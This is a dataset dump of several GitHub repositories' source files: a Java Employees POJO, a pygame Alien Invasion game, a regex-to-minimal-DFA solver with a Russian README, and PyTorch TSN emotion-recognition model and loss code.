com.neel.kafkacourse.types;\n\nimport com.fasterxml.jackson.annotation.JsonInclude;\nimport com.fasterxml.jackson.annotation.JsonProperty;\nimport com.fasterxml.jackson.annotation.JsonPropertyOrder;\nimport org.apache.commons.lang.builder.ToStringBuilder;\n\n@JsonInclude(JsonInclude.Include.NON_NULL)\n@JsonPropertyOrder({\n \"empid\",\n \"name\",\n \"department\",\n \"salary\"\n})\npublic class Employees {\n\n @JsonProperty(\"empid\")\n private String empid;\n @JsonProperty(\"name\")\n private String name;\n @JsonProperty(\"department\")\n private String department;\n @JsonProperty(\"salary\")\n private Integer salary;\n\n @JsonProperty(\"empid\")\n public String getEmpid() {\n return empid;\n }\n\n @JsonProperty(\"empid\")\n public void setEmpid(String empid) {\n this.empid = empid;\n }\n\n public Employees withEmpid(String empid) {\n this.empid = empid;\n return this;\n }\n\n @JsonProperty(\"name\")\n public String getName() {\n return name;\n }\n\n @JsonProperty(\"name\")\n public void setName(String name) {\n this.name = name;\n }\n\n public Employees withName(String name) {\n this.name = name;\n return this;\n }\n\n @JsonProperty(\"department\")\n public String getDepartment() {\n return department;\n }\n\n @JsonProperty(\"department\")\n public void setDepartment(String department) {\n this.department = department;\n }\n\n public Employees withDepartment(String department) {\n this.department = department;\n return this;\n }\n\n @JsonProperty(\"salary\")\n public Integer getSalary() {\n return salary;\n }\n\n @JsonProperty(\"salary\")\n public void setSalary(Integer salary) {\n this.salary = salary;\n }\n\n public Employees withSalary(Integer salary) {\n this.salary = salary;\n return this;\n }\n\n @Override\n public String toString() {\n return new ToStringBuilder(this).append(\"empid\", empid).append(\"name\", name).append(\"department\", department).append(\"salary\", salary).toString();\n }\n\n}\n" } ]
11
zhangfengknight/alien_invasion
https://github.com/zhangfengknight/alien_invasion
497f6c465e5612e06bcbf47e55e41f30cc0fa435
69f69325013541b653ccd23f2d47ac0f8af919a8
d1f4378ae3bae0f9652da66c2229738647f4e122
refs/heads/master
2020-12-06T22:00:23.438910
2020-01-08T13:26:12
2020-01-08T13:26:12
232,562,420
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.7275822758674622, "alphanum_fraction": 0.7298524379730225, "avg_line_length": 27.419355392456055, "blob_id": "4090cfe1764b71191a4934f790c40cc8d2803376", "content_id": "b6de92bdf0e66a61f1da6819bce10a26a9b33a47", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 961, "license_type": "no_license", "max_line_length": 68, "num_lines": 31, "path": "/alien_invasion/ship.py", "repo_name": "zhangfengknight/alien_invasion", "src_encoding": "GB18030", "text": "#coding:utf-8\nimport pygame\nclass Ship():\n\tdef __init__(self,all_settings,screen):\n\t\t\"\"\"set init positiong\"\"\"\n\t\tself.screen=screen\n\t\tself.all_settings=all_settings\n\t\t#加载飞船图像并获取其外接矩形\n\t\tself.image=pygame.image.load('images\\ship.bmp')\n\t\tself.rect=self.image.get_rect()\n\t\tself.screen_rect=screen.get_rect()\n\t\t\n\t\t#将每艘飞船放在屏幕底部中央\n\t\tself.rect.centerx=self.screen_rect.centerx\n\t\tself.rect.bottom=self.screen_rect.bottom\n\t\t\n\t\tself.center=float(self.rect.centerx)\n\t\t\n\t\tself.moving_right=False\n\t\tself.moving_left=False\n\t\t\n\tdef update(self):\n\t\tif self.moving_right and self.rect.right < self.screen_rect.right:\n\t\t\tself.center+=self.all_settings.ship_speed_factor\n\t\tif self.moving_left and self.rect.left > 0:\n\t\t\tself.center-=self.all_settings.ship_speed_factor#注意此处是减号 因为是在x轴上\n\t\t\n\t\tself.rect.centerx=self.center\n\tdef blitme(self):\n\t\t\"\"\"draw position\"\"\"\n\t\tself.screen.blit(self.image,self.rect)\n" }, { "alpha_fraction": 0.7165604829788208, "alphanum_fraction": 0.7213375568389893, "avg_line_length": 21.428571701049805, "blob_id": "77681484769e0e651239a58eb4cc6e27efa18498", "content_id": "6ff81972f7f1c4967df0be53cd25b7f23ea66db3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 628, "license_type": "no_license", "max_line_length": 54, "num_lines": 28, "path": "/alien_invasion/bullet.py", "repo_name": "zhangfengknight/alien_invasion", "src_encoding": "UTF-8", "text": "#coding:utf-8\n\nimport pygame\nfrom pygame.sprite import Sprite\n\nclass Bullet(Sprite):\n\tdef __init__(self,all_settings,screen,ship):\n\t\tsuper().__init__()\n\t\tself.screen=screen\n\t\n\t\tself.rect=pygame.Rect(0,0,all_settings.bullet_width,\n\t\t\tall_settings.bullet_height)\n\t\tself.rect.centerx=ship.rect.centerx\n\t\tself.rect.top=ship.rect.top\n\t\n\t\tself.y=float(self.rect.y)\n\t\t\n\t\tself.color=all_settings.bullet_color\n\t\tself.speed_factor=all_settings.bullet_speed_factor\n\t\t\n\t\t#self.space=False\n\tdef update(self):\n\t\t\n\t\tself.y-=self.speed_factor\n\t\tself.rect.y=self.y\n\t\t\n\tdef draw_bullet(self):\n\t\tpygame.draw.rect(self.screen,self.color,self.rect)\n" }, { "alpha_fraction": 0.7154626250267029, "alphanum_fraction": 0.7167300581932068, "avg_line_length": 29.34000015258789, "blob_id": "339f138705c5dfb3980c1b0337980983d03c6f77", "content_id": "822896d93cd2566101b651f80c07e407a86d6eeb", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1672, "license_type": "no_license", "max_line_length": 68, "num_lines": 50, "path": "/alien_invasion/game_functions.py", "repo_name": "zhangfengknight/alien_invasion", "src_encoding": "GB18030", "text": "#coding:utf-8\n\nimport sys\nimport pygame\nfrom bullet import Bullet\n\ndef check_events(all_settings,screen,ship,bullets):\n\t\"\"\"Corresponding buttons and mouse\"\"\"\n\tfor event in pygame.event.get():\n\t\tif event.type==pygame.QUIT:\n\t\t\tsys.exit()\n\t\t\t\n\t\telif event.type==pygame.KEYDOWN:#按下键时\n\t\t\tcheck_keydown_events(event,all_settings,screen,ship,bullets)\n\t\t\tcheck_keydown_events(event,all_settings,screen,ship,bullets)\n\t\telif event.type==pygame.KEYUP:#松开键时\n\t\t\tcheck_keyup_events(event,ship)\n\t\t\t#check_keydown_events(event,all_settings,screen,ship,bullets)\ndef update_screen(all_settings,screen,ship,bullets):\n\t\"\"\"update screen turn new screen\"\"\"\n\t#每次循环时都重绘屏幕\n\tscreen.fill(all_settings.bg_color)#填充屏幕 只接受一个参数\n\tship.blitme()#绘制飞船\n\tfor bullet in bullets.sprites():\n\t\tbullet.draw_bullet()\n\t#让最近绘制的屏幕可见\n\tpygame.display.flip()\ndef check_keydown_events(event,all_settings,screen,ship,bullets):#按键\n\tif event.key==pygame.K_RIGHT:\n\t\tship.moving_right=True\n\telif event.key==pygame.K_LEFT:\n\t\tship.moving_left=True\n\telif event.key==pygame.K_SPACE:\n\t\t#bullets.space=True\n\t\tif len(bullets) < all_settings.bullets_allowed:\n\t\t\tnew_bullet=Bullet(all_settings,screen,ship)\n\t\t\tbullets.add(new_bullet)\ndef check_keyup_events(event,ship):#松键\n\tif event.key==pygame.K_RIGHT:\n\t\tship.moving_right=False\n\telif event.key==pygame.K_LEFT:\n\t\tship.moving_left=False\n\t#elif event.key==pygame.K_SPACE:\n\t\t#bullets.space=False\t\n\ndef update_bullets(bullets):\t\n\tbullets.update()\n\tfor bullet in bullets.copy():\n\t\tif bullet.rect.bottom <= 0:\n\t\t\tbullets.remove(bullet)\n\t\t\n\t\t\n\t\t\n\t\t\n\t\t\n\t\t\n\t\t\n\t\t\n\t\t\n\t\t\n\t\t\n\t\t\n\t\t\n\t\t\n\t\t\n\t\t\n\t\t\n\t\t\n\t\t\n\t\t\t\n" }, { "alpha_fraction": 0.7516340017318726, "alphanum_fraction": 0.7529411911964417, "avg_line_length": 20.85714340209961, "blob_id": "d5ed727676e5341ee72f894184265e88688596d0", "content_id": "2855f5e397240e5380aec75f201ba0d378c82e8d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 847, "license_type": "no_license", "max_line_length": 57, "num_lines": 35, "path": "/alien_invasion/alien_invasion.py", "repo_name": "zhangfengknight/alien_invasion", "src_encoding": "GB18030", "text": "#coding:utf-8\n\nimport pygame\nfrom ship import Ship\nfrom settings import Settings\nimport game_functions as gf\nfrom pygame.sprite import Group\n#from bullet import Bullet\ndef run_game(): \n\tpygame.init()\n\tall_settings=Settings()\n\tscreen=pygame.display.set_mode(\n\t\t(all_settings.screen_width,all_settings.screen_height))\n\tpygame.display.set_caption(\"Alien Invasion\")\n\t\n\t#创建一艘飞船\n\tship=Ship(all_settings,screen)\n\t#创建一个用于储存子弹的编组\n\tbullets=Group()\n\t\n\t#开始游戏的主循环\n\twhile True:\n\t\t\n\t\t#监听键鼠事件\n\t\tgf.check_events(all_settings,screen,ship,bullets)\n\t\tgf.check_events(all_settings,screen,ship,bullets)\n\t\tship.update()\n\t\tgf.update_bullets(bullets)\n\t\t\n\t\t\n\t\tgf.update_screen(all_settings,screen,ship,bullets)\n\t\t#重新加载飞船图像\n\t\tgf.update_screen(all_settings,screen,ship,bullets)\t\n\t\t\nrun_game()\n" }, { "alpha_fraction": 0.6179401874542236, "alphanum_fraction": 0.7109634280204773, "avg_line_length": 24.08333396911621, "blob_id": "4366f7953aca58f206991ccce50d5288c388012c", "content_id": "666ce2db0e9906ab5eb7f8858d74fcbe714a5956", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 301, "license_type": "no_license", "max_line_length": 29, "num_lines": 12, "path": "/alien_invasion/settings.py", "repo_name": "zhangfengknight/alien_invasion", "src_encoding": "UTF-8", "text": "class Settings():\n\t\"\"\"store all settings\"\"\"\n\tdef __init__(self):\n\t\tself.screen_width=1200\n\t\tself.screen_height=800\n\t\tself.bg_color=(230,230,230)\n\t\tself.ship_speed_factor=1\n\t\tself.bullet_speed_factor=1\n\t\tself.bullet_width=3\n\t\tself.bullet_height=15\n\t\tself.bullet_color=60,60,60\n\t\tself.bullets_allowed=3\n" } ]
5
orusovten/orusovten-mipt-flat-2020-practice1
https://github.com/orusovten/orusovten-mipt-flat-2020-practice1
13e42b7e39b2d730b27f222b74e90e352d6221cb
6f055b164f38693d4768462c2b789e963b791444
363e1df9dc2589910e64e90a523f19679b8e1a28
refs/heads/master
2023-02-13T23:38:06.760670
2021-01-11T13:26:01
2021-01-11T13:26:01
311,153,490
6
0
null
2020-11-08T20:57:35
2021-01-11T13:25:49
2021-01-11T13:26:02
null
[ { "alpha_fraction": 0.551353394985199, "alphanum_fraction": 0.5530509948730469, "avg_line_length": 39.46946716308594, "blob_id": "a7087ca2c44d2b24a2b28261bebce23a11e64c54", "content_id": "29f34bf94c04dda2650b72d829098bf4aed29b4d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 10603, "license_type": "no_license", "max_line_length": 119, "num_lines": 262, "path": "/RegularExpressionAutomaton.py", "repo_name": "orusovten/orusovten-mipt-flat-2020-practice1", "src_encoding": "UTF-8", "text": "from collections import deque\nfrom queue import Queue\n\n\nclass MyDFA:\n def __init__(self):\n self.states = set()\n self.input_symbols = set()\n self.transitions = dict()\n self.initial_state = ''\n self.final_states = set()\n\n def minify(self):\n symbol_classes = dict()\n for state in self.states - self.final_states:\n symbol_classes.update({state: 0})\n for state in self.final_states:\n symbol_classes.update({state: 1})\n equiv_classes = [self.states - self.final_states, self.states]\n alphabet_list = list(self.input_symbols)\n is_end = False\n while not is_end:\n clazzes_dict = dict()\n for state in self.states:\n clazz = (symbol_classes[state],\n *[symbol_classes[self.transitions[state][symbol]] for symbol in alphabet_list])\n if clazzes_dict.get(clazz) is None:\n clazzes_dict.update({clazz: {state}})\n else:\n clazzes_dict[clazz].add(state)\n new_equiv_classes = [set() for i in range(len(clazzes_dict.keys()))]\n new_symbol_classes = dict()\n for i, states in enumerate(clazzes_dict.values()):\n for state in states:\n new_symbol_classes.update({state: i})\n new_equiv_classes[i] = states\n if len(new_equiv_classes) == len(equiv_classes):\n is_end = True\n equiv_classes = new_equiv_classes\n symbol_classes = new_symbol_classes\n min_dfa = MyDFA()\n min_dfa.input_symbols = self.input_symbols\n for i in range(len(equiv_classes)):\n min_dfa.states.add(i)\n delegate = equiv_classes[i].pop()\n equiv_classes[i].add(delegate)\n for symbol in self.input_symbols:\n if min_dfa.transitions.get(i) is None:\n min_dfa.transitions.update({i:\n {symbol: symbol_classes[self.transitions[delegate][symbol]]}})\n else:\n min_dfa.transitions[i].update({symbol:\n symbol_classes[self.transitions[delegate][symbol]]})\n if delegate in self.final_states:\n min_dfa.final_states.add(i)\n min_dfa.initial_state = symbol_classes[self.initial_state]\n return min_dfa\n\n\nclass MyNFA:\n def __init__(self):\n self.states = set()\n self.input_symbols = set()\n self.transitions = dict()\n self.initial_state = 0\n self.final_states = set()\n\n def bfs(self, start_state, symbol) -> (set, bool):\n queue = Queue()\n queue.put(start_state)\n states = set()\n visited = set()\n is_final = False\n while not queue.empty():\n state = queue.get()\n if state in self.final_states:\n is_final = True\n visited.add(state)\n if self.transitions[state].get(symbol) is not None:\n for neighbour_state in self.transitions[state][symbol]:\n states.add(neighbour_state)\n if self.transitions[state].get('') is not None:\n for neighbour_state in self.transitions[state]['']:\n if neighbour_state not in visited:\n visited.add(neighbour_state)\n queue.put(neighbour_state)\n return states, is_final\n\n def deleting_empty_transitions(self):\n new_nfa = MyNFA()\n new_nfa.input_symbols = self.input_symbols - {''}\n new_nfa.initial_state = self.initial_state\n good_states = {self.initial_state}\n while len(good_states) > 0:\n state = good_states.pop()\n new_nfa.transitions.update({state: dict()})\n new_nfa.states.add(state)\n for symbol in new_nfa.input_symbols:\n states, is_final = self.bfs(state, symbol)\n new_nfa.transitions[state].update({symbol: states})\n good_states |= states - new_nfa.states\n if is_final:\n new_nfa.final_states.add(state)\n return new_nfa\n\n @staticmethod\n def get_from_set_fields_to_int_fields(states_sets, final_states_sets, set_transitions, alphabet,\n initial_state) -> MyDFA:\n my_dfa = MyDFA()\n states_sets_dict = {states_set: i for i, states_set in enumerate(states_sets)}\n my_dfa.initial_state = states_sets_dict.get(frozenset([initial_state]))\n my_dfa.states = set(states_sets_dict.values())\n for set_state in final_states_sets:\n my_dfa.final_states.add(states_sets_dict[set_state])\n my_dfa.transitions = {i: {symbol: states_sets_dict[set_transitions[states_set][symbol]] for symbol in alphabet}\n for states_set, i in states_sets_dict.items()}\n my_dfa.input_symbols = alphabet\n return my_dfa\n\n def determinization(self) -> MyDFA:\n states_sets = {frozenset([self.initial_state])}\n final_states_sets = set()\n set_transitions = dict()\n queue = Queue()\n queue.put(frozenset([self.initial_state]))\n while not queue.empty():\n vertices_set = queue.get()\n set_transitions.update({vertices_set: dict()})\n for symbol in self.input_symbols:\n new_vertices_set = set()\n is_terminal = False\n for vertex in vertices_set:\n if symbol in self.transitions[vertex]:\n for neighbour_vertex in self.transitions[vertex][symbol]:\n if neighbour_vertex not in new_vertices_set:\n new_vertices_set.add(neighbour_vertex)\n if neighbour_vertex in self.final_states:\n is_terminal = True\n new_vertices_set = frozenset(new_vertices_set)\n set_transitions[vertices_set].update({symbol: new_vertices_set})\n if new_vertices_set not in states_sets:\n states_sets.add(new_vertices_set)\n queue.put(new_vertices_set)\n if is_terminal:\n final_states_sets.add(new_vertices_set)\n return MyNFA.get_from_set_fields_to_int_fields(states_sets, final_states_sets, set_transitions,\n self.input_symbols, self.initial_state)\n\n number_of_state = 0\n\n def init_by_symbol(self, symbol):\n if symbol == '1':\n self.initial_state = MyNFA.number_of_state\n MyNFA.number_of_state += 1\n self.transitions = {self.initial_state: {}}\n self.final_states = {self.initial_state}\n self.states = self.final_states\n else:\n new_vertex = MyNFA.number_of_state\n self.initial_state = new_vertex\n MyNFA.number_of_state += 1\n new_vertex = MyNFA.number_of_state\n self.final_states = {new_vertex}\n self.transitions = {self.initial_state: {symbol: {new_vertex}}, new_vertex: {}}\n self.states = {self.initial_state} | self.final_states\n MyNFA.number_of_state += 1\n return self\n\n\ndef sum(left, right) -> MyNFA: # operator +\n if left.transitions[left.initial_state].get('') is None:\n left.transitions[left.initial_state].update({'': {right.initial_state}})\n else:\n left.transitions[left.initial_state][''].add(right.initial_state)\n left.transitions.update(right.transitions)\n if left.initial_state in left.final_states:\n left.final_states.pop(left.initial_state)\n left.final_states |= right.final_states\n left.states |= right.states\n return left\n\n\ndef concatenate(left, right) -> MyNFA: # operator .\n for final_state in left.final_states:\n if left.transitions[final_state].get('') is None:\n left.transitions[final_state].update({'': {right.initial_state}})\n else:\n left.transitions[final_state][''].add(right.initial_state)\n left.transitions.update(right.transitions)\n left.states.update(right.states)\n left.final_states = right.final_states\n return left\n\n\ndef star(automaton) -> MyNFA: # operator *\n for final_state in automaton.final_states:\n automaton.transitions.update({final_state: {'': {automaton.initial_state}}})\n automaton.final_states.add(automaton.initial_state)\n return automaton\n\n\ndef build_automaton(expression, expression_alphabet) -> MyNFA:\n stack = deque()\n for symbol in expression:\n if symbol in expression_alphabet:\n automaton = MyNFA()\n stack.append(automaton.init_by_symbol(symbol))\n elif symbol == \"*\":\n if len(stack) == 0:\n print(\"ERROR\")\n break\n stack.append(star(stack.pop()))\n elif symbol == \"+\":\n if len(stack) < 2:\n print(\"ERROR\")\n break\n right = stack.pop()\n left = stack.pop()\n stack.append(sum(left, right))\n elif symbol == \".\":\n if len(stack) < 2:\n print(\"ERROR\")\n break\n right = stack.pop()\n left = stack.pop()\n stack.append(concatenate(left, right))\n else:\n print(\"ERROR\")\n break\n if len(stack) != 1:\n print(\"ERROR\")\n else:\n nfa = stack.pop()\n nfa.input_symbols = expression_alphabet - {'1'} | {''}\n return nfa\n\n\ndef count_length_of_the_longest_substring_matching(expression, word) -> int:\n expression_alphabet = {'a', 'b', 'c', '1'}\n my_nfa = build_automaton(expression, expression_alphabet)\n nfa_without_empty_transitions = my_nfa.deleting_empty_transitions()\n dfa = nfa_without_empty_transitions.determinization()\n min_dfa = dfa.minify()\n ans = 0\n for i in range(len(word)):\n pre_ans = 0\n state = min_dfa.initial_state\n for j in range(i, len(word)):\n if word[j] not in min_dfa.input_symbols:\n break\n state = min_dfa.transitions[state][word[j]]\n if state in min_dfa.final_states:\n pre_ans = j - i + 1\n if pre_ans > ans:\n ans = pre_ans\n return ans\n\n\nif __name__ == '__main__':\n expression = input()\n word = input()\n print(count_length_of_the_longest_substring_matching(expression, word))\n" }, { "alpha_fraction": 0.6574627161026001, "alphanum_fraction": 0.6716417670249939, "avg_line_length": 59.90909194946289, "blob_id": "da99a8b82b914102799c1ba1c2553d649c7baf38", "content_id": "7940d81167d8d3fd5aee4a36d17f54f689513a39", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 2122, "license_type": "no_license", "max_line_length": 128, "num_lines": 22, "path": "/README.md", "repo_name": "orusovten/orusovten-mipt-flat-2020-practice1", "src_encoding": "UTF-8", "text": "# orusovten-mipt-flat-2020-practice1\n***Задача*** \nДаны регулярное выражение α и слово u из {a,b,c}*. \nНайти длину самого длинного подслова u в L(α).\n***\n***Идея алгоритма*** \n**Шаг 1** Строим НКА(с возможно epsilon-переходами) по регулярному выражению \n**Шаг 2** Удаляем epsilon-переходы \n**Шаг 3** Переводим НКА в ПДКА \n**Шаг 4** Переводим ПДКА в минимальный ПДКА \n**Шаг 5** \"Запускаемся\" из стартового состояния по последовательным буквам слева направо, начиная с i-ой, i = 0, 1, ..., |u|. \nНа каждой подытерации проверяем, не пришли ли в завершающее состояние, если да, то стараемся обновить ответ.\n***\n***Оценка асимптотики*** \n**Шаг 1** O(|α| * q), где q - число состояний в НКА, в худшем случае для асимптотики все cостояния - завершающие \n**Шаг 2** O(E * q), по каждому символу и по каждому состоянию делаем линейные запуски по eplison-ребрам + ребро-символ. \n**Шаг 3** O((Q * q * E), где Q и q - числа состояний в ПДКА и НКА соответственно, E - число ребер в исходном, \nчисло итераций равно Q, каждая из них занимает O(q * E), т.к. состояния ПДКА есть \"мультисостояния НКА\". \n**Шаг 4** O((Q - min_Q) * Q), где Q - число состояний в ПДКА, min_Q - число состояний в МПДКА, \nчисло итераций(каждая из которых занимает O(Q)) не более, чем (Q - min_Q). \n**Шаг 5** O(|u|^2) \n**Итог** O(|u|^2 + Q * q * E)\n" } ]
2
VivianLiangB/NTUA-BEEU-eccv2020
https://github.com/VivianLiangB/NTUA-BEEU-eccv2020
4fd1dd081389faedb1eb119955914819f59336aa
db1d5dde5e60a57a5fa4d65f137410cfdfa8eca9
207a8e195d7b22963305095396ac52e97b99aa69
refs/heads/master
2023-03-18T03:09:21.606483
2021-03-04T20:07:54
2021-03-04T20:07:54
null
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6022052764892578, "alphanum_fraction": 0.622561514377594, "avg_line_length": 22.13725471496582, "blob_id": "494e1d47febf6396d266f30ba457ddb4ceb718ed", "content_id": "a66c54b1abda4391275413fb79a1cb851482ab01", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1179, "license_type": "no_license", "max_line_length": 58, "num_lines": 51, "path": "/model/loss.py", "repo_name": "VivianLiangB/NTUA-BEEU-eccv2020", "src_encoding": "UTF-8", "text": "import torch.nn.functional as F\nimport torch.nn as nn\nimport torch\nfrom torch.autograd import Variable, Function\n\ndef nll_loss(output, target):\n return F.nll_loss(output, target)\n\n\ndef bce_loss(output, target):\n\n t = target.clone().detach()\n\n t[t >= 0.5] = 1 # threshold to get binary labels\n t[t < 0.5] = 0\n\n loss = F.binary_cross_entropy_with_logits(output, t)\n return loss\n\ndef combined_loss(output, target):\n l = F.mse_loss(output, target)\n\n l += bce_loss(output, target)\n\n return l\n\ndef mse_loss(output, target):\n\treturn F.mse_loss(output, target)\n\n\ndef mse_center_loss(output, target, labels):\n t = labels.clone().detach()\n t[t >= 0.5] = 1 # threshold to get binary labels\n t[t < 0.5] = 0\n\n target = target[0,:26]\n\n positive_centers = []\n for i in range(output.size(0)):\n p = target[t[i, :] == 1]\n if p.size(0) == 0:\n positive_center = torch.zeros(300).cuda()\n else:\n positive_center = torch.mean(p, dim=0)\n\n positive_centers.append(positive_center)\n\n positive_centers = torch.stack(positive_centers,dim=0)\n loss = F.mse_loss(output, positive_centers)\n \n return loss" }, { "alpha_fraction": 0.5576669573783875, "alphanum_fraction": 0.5712873339653015, "avg_line_length": 35.70161437988281, "blob_id": "7da19cae7cfe1dfb768d48c600e2b307f69178a7", "content_id": "c0d0f5913454e696b69e62ab05b047efa51d7401", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 9104, "license_type": "no_license", "max_line_length": 113, "num_lines": 248, "path": "/model/models.py", "repo_name": "VivianLiangB/NTUA-BEEU-eccv2020", "src_encoding": "UTF-8", "text": "from torch import nn\nimport torch.nn.functional\nimport torch\nfrom .ops.basic_ops import ConsensusModule, Identity\nfrom torch.nn.init import normal, constant\nfrom torch.nn import Parameter\nimport torchvision\nimport numpy as np\n\nclass TSN(nn.Module):\n def __init__(self, num_class, num_segments, modality,\n base_model='resnet18', new_length=None,\n consensus_type='avg', before_softmax=True,\n dropout=0.8, modalities_fusion='cat', \n crop_num=1, partial_bn=True, context=False, embed=False):\n super(TSN, self).__init__()\n self.modality = modality\n self.num_segments = num_segments\n self.reshape = True\n self.before_softmax = before_softmax\n self.dropout = dropout\n self.crop_num = crop_num\n self.consensus_type = consensus_type\n self.embed = embed\n\n self.name_base = base_model\n if not before_softmax and consensus_type != 'avg':\n raise ValueError(\"Only avg consensus can be used after Softmax\")\n\n if new_length is None:\n self.new_length = 1 if modality == \"RGB\" else 5\n else:\n self.new_length = new_length\n\n print((\"\"\"\nInitializing TSN with base model: {}.\nTSN Configurations:\n input_modality: {}\n num_segments: {}\n new_length: {}\n consensus_module: {}\n dropout_ratio: {}\n \"\"\".format(base_model, self.modality, self.num_segments, self.new_length, consensus_type, self.dropout)))\n self.embed = embed\n\n self._prepare_base_model(base_model)\n \n self.context = context\n\n if context:\n self._prepare_context_model()\n\n feature_dim = self._prepare_tsn(num_class)\n\n if self.modality == 'Flow':\n print(\"Converting the ImageNet model to a flow init model\")\n self.base_model = self._construct_flow_model(self.base_model)\n print(\"Done. Flow model ready...\")\n\n if self.context:\n print(\"Converting the context model to a flow init model\")\n self.context_model = self._construct_flow_model(self.context_model)\n print(\"Done. Flow model ready...\")\n\n\n self.consensus = ConsensusModule(consensus_type)\n self.consensus_cont = ConsensusModule(consensus_type)\n\n if self.embed:\n self.consensus_embed = ConsensusModule(consensus_type)\n\n if not self.before_softmax:\n self.softmax = nn.Softmax()\n\n self._enable_pbn = partial_bn\n if partial_bn:\n self.partialBN(True)\n\n def _prepare_tsn(self, num_class):\n std = 0.001\n\n if isinstance(self.base_model, torch.nn.modules.container.Sequential):\n feature_dim = 2048\n else:\n feature_dim = getattr(self.base_model, self.base_model.last_layer_name).in_features\n if self.dropout == 0:\n setattr(self.base_model, self.base_model.last_layer_name, nn.Linear(feature_dim, num_class))\n self.new_fc = None\n else:\n setattr(self.base_model, self.base_model.last_layer_name, nn.Dropout(p=self.dropout))\n\n if self.context:\n num_feats = 4096\n else:\n num_feats = 2048\n\n if self.embed:\n self.embed_fc = nn.Linear(num_feats,300)\n normal(self.embed_fc.weight, 0, std)\n constant(self.embed_fc.bias, 0)\n\n self.new_fc = nn.Linear(num_feats, num_class)\n normal(self.new_fc.weight, 0, std)\n constant(self.new_fc.bias, 0)\n\n self.new_fc_1 = nn.Linear(num_feats, 3)\n normal(self.new_fc_1.weight, 0, std)\n constant(self.new_fc_1.bias, 0)\n\n\n return num_feats\n\n\n def _prepare_context_model(self):\n self.context_model = getattr(torchvision.models, \"resnet50\")(True)\n modules = list(self.context_model.children())[:-1] # delete the last fc layer.\n self.context_model = nn.Sequential(*modules)\n\n def _prepare_base_model(self, base_model):\n import torchvision, torchvision.models\n\n if 'resnet' in base_model or 'vgg' in base_model or 'resnext' in base_model or 'densenet' in base_model:\n self.base_model = getattr(torchvision.models, base_model)(True)\n self.base_model.last_layer_name = 'fc'\n self.input_size = 224\n self.input_mean = [0.485, 0.456, 0.406]\n self.input_std = [0.229, 0.224, 0.225]\n\n if self.modality == 'Flow':\n self.input_mean = [0.5]\n self.input_std = [np.mean(self.input_std)]\n \n else:\n raise ValueError('Unknown base model: {}'.format(base_model))\n\n def train(self, mode=True):\n \"\"\"\n Override the default train() to freeze the BN parameters\n :return:\n \"\"\"\n super(TSN, self).train(mode)\n count = 0\n if self._enable_pbn:\n print(\"Freezing BatchNorm2D except the first one.\")\n for m in self.base_model.modules():\n if isinstance(m, nn.BatchNorm2d):\n count += 1\n if count >= (2 if self._enable_pbn else 1):\n m.eval()\n\n # shutdown update in frozen mode\n m.weight.requires_grad = False\n m.bias.requires_grad = False\n count = 0\n if self.context:\n print(\"Freezing BatchNorm2D except the first one.\")\n for m in self.context_model.modules():\n if isinstance(m, nn.BatchNorm2d):\n count += 1\n if count >= (2 if self._enable_pbn else 1):\n m.eval()\n\n # shutdown update in frozen mode\n m.weight.requires_grad = False\n m.bias.requires_grad = False\n\n\n\n def partialBN(self, enable):\n self._enable_pbn = enable\n\n def get_optim_policies(self):\n params = [{'params': self.parameters()}]\n\n return params\n\n\n\n def forward(self, input, embeddings):\n sample_len = (3 if self.modality == \"RGB\" else 2) * self.new_length\n\n if self.context:\n inp = input.view((-1, sample_len) + input.size()[-2:])\n\n body_indices = list(range(0,inp.size(0),2))\n context_indices = list(range(1,inp.size(0),2))\n\n body = inp[body_indices]\n context = inp[context_indices]\n else:\n body = input.view((-1, sample_len) + input.size()[-2:])\n\n base_out = self.base_model(body).squeeze(-1).squeeze(-1)\n\n if self.context:\n context_out = self.context_model(context).squeeze(-1).squeeze(-1)\n base_out = torch.cat((base_out, context_out),dim=1)\n\n outputs = {}\n\n if self.embed:\n embed_segm = self.embed_fc(base_out)\n embed = embed_segm.view((-1, self.num_segments) + embed_segm.size()[1:])\n embed = self.consensus_embed(embed).squeeze(1)\n outputs['embed'] = embed\n\n\n base_out_cat = self.new_fc(base_out)\n base_out_cont = self.new_fc_1(base_out)\n\n base_out_cat = base_out_cat.view((-1, self.num_segments) + base_out_cat.size()[1:])\n base_out_cont = base_out_cont.view((-1, self.num_segments) + base_out_cont.size()[1:])\n\n output = self.consensus(base_out_cat)\n outputs['categorical'] = output.squeeze(1)\n\n output_cont = self.consensus_cont(base_out_cont)\n outputs['continuous'] = output_cont.squeeze(1)\n\n return outputs\n\n\n def _construct_flow_model(self, base_model):\n # modify the convolution layers\n # Torch models are usually defined in a hierarchical way.\n # nn.modules.children() return all sub modules in a DFS manner\n modules = list(base_model.modules())\n first_conv_idx = list(filter(lambda x: isinstance(modules[x], nn.Conv2d), list(range(len(modules)))))[0]\n conv_layer = modules[first_conv_idx]\n container = modules[first_conv_idx - 1]\n\n # modify parameters, assume the first blob contains the convolution kernels\n params = [x.clone() for x in conv_layer.parameters()]\n kernel_size = params[0].size()\n new_kernel_size = kernel_size[:1] + (2 * self.new_length, ) + kernel_size[2:]\n new_kernels = params[0].data.mean(dim=1, keepdim=True).expand(new_kernel_size).contiguous()\n\n new_conv = nn.Conv2d(2 * self.new_length, conv_layer.out_channels,\n conv_layer.kernel_size, conv_layer.stride, conv_layer.padding,\n bias=True if len(params) == 2 else False)\n new_conv.weight.data = new_kernels\n if len(params) == 2:\n new_conv.bias.data = params[1].data # add bias if neccessary\n layer_name = list(container.state_dict().keys())[0][:-7] # remove .weight suffix to get the layer name\n\n # replace the first convlution layer\n setattr(container, layer_name, new_conv)\n return base_model\n\n\n" }, { "alpha_fraction": 0.7021868824958801, "alphanum_fraction": 0.7371769547462463, "avg_line_length": 44.745452880859375, "blob_id": "7ce8fd484343458b57743872b91b7e742f424de2", "content_id": 